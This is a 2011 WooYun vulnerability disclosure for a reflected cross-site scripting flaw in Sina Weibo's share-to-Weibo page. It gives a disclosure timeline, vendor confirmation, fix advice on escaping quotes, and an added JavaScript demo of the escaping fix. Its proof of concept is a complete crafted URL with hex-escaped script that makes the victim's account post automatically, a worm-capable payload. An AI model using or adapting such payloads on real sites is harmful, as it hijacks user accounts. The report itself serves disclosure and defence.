
Vulnerability summary

Defect ID: wooyun-2011-02601

Title: Sina Weibo XSS vulnerability

Vendor: Sina

Author: 西贝

Submitted: 2011-07-31 20:21

Fixed: 2011-08-30 20:22

Published: 2011-08-30 20:22

Vulnerability type: XSS (cross-site scripting)

Severity: Medium

Self-assessed Rank: 5

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2011-07-31: Details sent to the vendor, awaiting vendor handling
2011-08-01: Vendor confirmed; details disclosed to the vendor only
2011-08-11: Details disclosed to core white hats and domain experts
2011-08-21: Details disclosed to regular white hats
2011-08-31: Details disclosed to intern white hats
2011-08-30: Details disclosed to the public

Brief description:

The share-to-Weibo feature has a reflected JS string injection vulnerability.

Detailed description:

The share-to-Weibo feature has a reflected JS string injection vulnerability that could be used to spread a worm. Works against IE.

Proof of vulnerability:

http://v.t.sina.com.cn/share/share.php?url=http%3A%2F%2Fent.sina.com.cn%2Fs%2Fu%2F2011-07-31%2F06243373397.shtml&title=%E8%8B%B1%E5%9B%BD%E5%A5%B3%E7%8E%8B%E5%A4%96%E5%AD%99%E5%A5%B3%E5%AE%8C%E5%A9%9A%20%E5%92%8C%E6%A9%84%E6%A6%84%E7%90%83%E9%98%9F%E9%95%BF%E5%96%9C%E7%BB%93%E8%BF%9E%E7%90%86&ralateUid=1642591402&source=%E6%96%B0%E6%B5%AA%E5%A8%B1%E4%B9%90&sourceUrl=http%3A%2F%2Fent.sina.com.cn%2F&content=gb2312&pic=http%3A%2F%2Fi2.sinaimg.cn%2Fent%2Fs%2Fu%2F2011-07-31%2FU3088P28T3D3373397F326DT20110731062401.jpg%5Cx22%20class%3D%5Cx22pic%5Cx22%5Cx3e%5Cx3cscript%20type%3D%5Cx22text%2Fjavascript%5Cx22%20defer%3D%5Cx22true%5Cx22%5Cx3eif(sss%3D%3D%3Dundefined){var%20sss%3Dtrue;Utils.Io.Ajax.request(%5Cx22%2Fshare%2Faj_share.php%5Cx22,{POST%3A{%5Cx22content%5Cx22%3A%5Cx22hello%20weibo!%5Cx22,%5Cx22styleid%5Cx22%3A1,%5Cx22from%5Cx22%3A%5Cx22share%5Cx22,%5Cx22sourceUrl%5Cx22%3A%5Cx22http%3A%2F%2Fent.sina.com.cn%5Cx22,%5Cx22source%5Cx22%3A%5Cx22%E6%96%B0%E6%B5%AA%E5%A8%B1%E4%B9%90%5Cx22,%5Cx22refer%5Cx22%3A%5Cx22http%3A%2F%2Fent.sina.com.cn%5Cx22,%5Cx22url_type%5Cx22%3A0,%5Cx22appkey%5Cx22%3A%5Cx224017307543%5Cx22},onComplete%3Afunction(json){},onException%3Afunction(){},returnType%3A%5Cx22json%5Cx22});}%5Cx3c%2Fscript%5Cx3e%5Cx3cimg%20width%3D0%20height%3D0%20src%3D%5Cx22

Fix recommendation:

Do not just filter \x3E and \x3C: even without "<" and ">", JS code can still be loaded from an img tag's onload attribute.
The fundamental fix is:
php: addslashes
smarty: escape:'quotes'
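The point of the fix above is that the parameter is written into a JavaScript string literal, so an input carrying only backslash-hex escapes (\x22, \x3c, \x3e) passes a bracket/quote filter, yet decodes to quotes and tags once the script runs. The following is an added illustration, not code from the report or from Sina: a vulnerable filter-only template next to a backslash-aware escape (the JavaScript stand-in for addslashes / escape:'quotes'), with a constructed sample value and a simulated browser evaluation.

```javascript
// Added example (not from the report): why stripping < > " is not enough when the
// value lands inside a JS string literal, and how backslash-aware escaping fixes it.

// Constructed sample input: contains no literal <, > or " characters, only
// backslash-hex escapes, so a character filter leaves it untouched.
const CONSTRUCTED_PIC =
  'http://example.invalid/a.jpg\\x22 class=\\x22pic\\x22\\x3e' +
  '\\x3cimg onload=\\x22console.log(1)\\x22 src=x\\x3e';

// Vulnerable template: removes < > " and interpolates into a JS string literal.
// The backslashes survive, so the JS engine decodes \x22 to " and \x3c to <.
function vulnerableScript(pic) {
  const filtered = pic.replace(/[<>"]/g, '');
  return 'var pic = "' + filtered + '";';
}

// Hardened template: JSON.stringify escapes backslashes and quotes (like addslashes /
// escape:'quotes'), so \x22 in the input becomes \\x22 in the source and stays a
// literal four-character sequence at runtime. "<" is additionally written as \u003c
// so the literal can never close the surrounding <script> element.
function hardenedScript(pic) {
  const literal = JSON.stringify(pic).replace(/</g, '\\u003c');
  return 'var pic = ' + literal + ';';
}

// Simulate the browser: execute the generated script and return the runtime value.
function evaluatePic(scriptSource) {
  return new Function(scriptSource + ' return pic;')();
}

// The share page concatenated the value into an <img> tag. Count how many element
// tags the resulting markup contains; more than one means the value broke out.
function tagCount(scriptSource) {
  const html = '<img src="' + evaluatePic(scriptSource) + '">';
  return (html.match(/<[a-z]/gi) || []).length;
}

console.log('vulnerable tags:', tagCount(vulnerableScript(CONSTRUCTED_PIC))); // 2
console.log('hardened tags:', tagCount(hardenedScript(CONSTRUCTED_PIC)));     // 1
```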

Copyright notice: when reposting, please credit the source: 西贝@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2011-08-01 10:15

Vendor reply:

Thanks for reporting.

Latest status:

None